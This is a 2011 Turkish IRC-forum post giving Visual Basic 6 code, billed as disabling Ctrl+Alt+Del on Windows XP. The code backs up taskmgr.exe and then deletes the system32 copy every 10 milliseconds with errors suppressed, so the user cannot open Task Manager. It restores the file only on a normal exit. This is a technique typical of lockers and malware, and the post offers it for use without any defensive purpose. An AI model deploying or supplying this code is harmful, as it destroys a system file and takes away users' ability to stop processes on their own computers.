IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası

IRCForumları - IRC ve mIRC Kullanıcılarının Buluşma Noktası (https://www.ircforumlari.net/)
-   Visual Basic (https://www.ircforumlari.net/visual-basic/)
-   -   Visual Basic - Windows Xp'de Ctrl + Alt + Del tuşları iptal etmek (https://www.ircforumlari.net/visual-basic/397177-visual-basic-windows-xpde-ctrl-alt-del-tuslari-iptal-etmek.html)

yoSun 13 Haziran 2011 23:00

Visual Basic - Windows Xp'de Ctrl + Alt + Del tuşları iptal etmek
 
winXP de system32 içinden bir dosya silerseniz birkaç saniye sonra Windows tarafından tekrar oluşturulur.

Kod:
Private Sub Form_Load()
FileCopy "c:\windows\system32\taskmgr.exe", "c:\windows\repair\taskmgr.exe"
'Burada Taskmgr dosyasını yedekledik
Timer1.Interval = 10
End Sub

Private Sub Form_Unload(Cancel As Integer)
FileCopy "c:\windows\repair\taskmgr.exe", "c:\windows\system32\taskmgr.exe"
End Sub

Private Sub Timer1_Timer()
On Local Error Resume Next
Kill "c:\windows\system32\taskmgr.exe"
End Sub


Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 05:30.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO
Copyright ©2004 - 2025 IRCForumlari.Net Sparhawk